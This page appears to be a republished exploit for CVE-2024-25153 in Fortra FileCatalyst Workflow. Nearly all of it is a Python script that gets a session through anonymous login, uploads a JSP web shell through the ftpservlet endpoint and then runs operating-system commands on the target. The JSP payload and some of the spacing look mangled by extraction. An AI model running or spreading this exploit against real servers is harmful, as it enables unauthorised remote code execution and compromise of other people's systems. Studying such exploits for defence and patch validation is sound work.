Fortra FileCatalyst Workflow远程代码执行漏漏洞(CVE-2024-25153)
Exploit for CVE-2024-25153: Remote Code Execution in Fortra FileCatalyst Workflow 5.x, before 5.1.6 Build 114
Full details can be found at
Usage: --host {hostname} --port {port} --url {url} --cmd {command}
import requests
import argparse
import re
import uuid
import urllib .parse
def exploit (host , port , url , cmd , secret ):
s = requests .Session ()
try :
session_response = s .get (f"{ host } :{ port } /{ url } " )
# Find session token
session_pattern = "\/workflow\/jsp\/logon.jsp;jsessionid=[A-Za-z0-9]+"
if (re .search (session_pattern ,session_response .text ) is None ):
print ("[-] => Error getting session token. Check the -u parameter is correct." )
# Redirect to main login
redirect = re .findall (session_pattern , session_response .text )[0 ]
redirect_response = s .get (f"{ host } :{ port } { redirect } " )
# Perform anonymous login
login_pattern = "\/workflow\/\?FCWEB.FORM.TOKEN=[A-Za-z0-9]+"
if (re .search (login_pattern ,redirect_response .text ) is None ):
print ("[-] => Error logging in. Check anonymous login is enabled." )
login = re .findall (login_pattern , redirect_response .text )[0 ]
login_response = s .get (f"{ host } :{ port } { login } " )
# Upload our shell
exploit_url = f"{ host } :{ port } /{ url } /servlet/ftpservlet?wf=octetStream&" ; # WARNING: Take great care if modifying the upload path (sid parameter). Attempting to upload in the top-level web root will delete the entire application.
exploit_headers = {"User-Agent" : "CVE-2024-25153" , "Content-Type" : "application/octet-stream" , "X-File-Name" : secret + ".jsp" }
exploit_data = """<%@ page import=\" java.util.*,*\" %>
if (request.getParameter(\" cmd\" ) != null) {
Process p = Runtime.getRuntime().exec(request.getParameter(\" cmd\" ));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
disr = dis.readLine();
exploit_response = s .post (exploit_url , headers = exploit_headers , data = exploit_data )
if ("success" not in exploit_response .text ):
print ("[-] => Error uploading file. Target may not be vulnerable." )
# Call the shell
cmd_safe = urllib .parse .quote (cmd )
cmd_response = s .get (f"{ host } :{ port } /{ url } /CVE-2024-25153/{ secret } .jsp?cmd={ cmd_safe } " )
print (cmd_response .text .strip ())
except requests .exceptions .RequestException as e :
print (f"[-] => Error occurred for { url } . Target may not be vulnerable." )
if __name__ == "__main__" :
parser = argparse .ArgumentParser ()
parser .add_argument ("-t" ,"--host" , type = str , help = "target hostname or IP address (include http:// or https://)" , required = True )
parser .add_argument ("-p" ,"--port" , type = int , default = 8080 , help = "target port (Default: 8080)" )
parser .add_argument ("-u" ,"--url" , type = str , default = "workflow" , help = "URL where FileCatalyst Workflow is installed (Default: workflow)" )
parser .add_argument ("-c" ,"--cmd" , type = str , default = "id" , help = "OS command to run (Default: id)" )
args = parser .parse_args ()
exploit (args .host , args .port , args .url , args .cmd , str (uuid .uuid4 ())) --host <hostname> --port <port> --url <url> --cmd <command>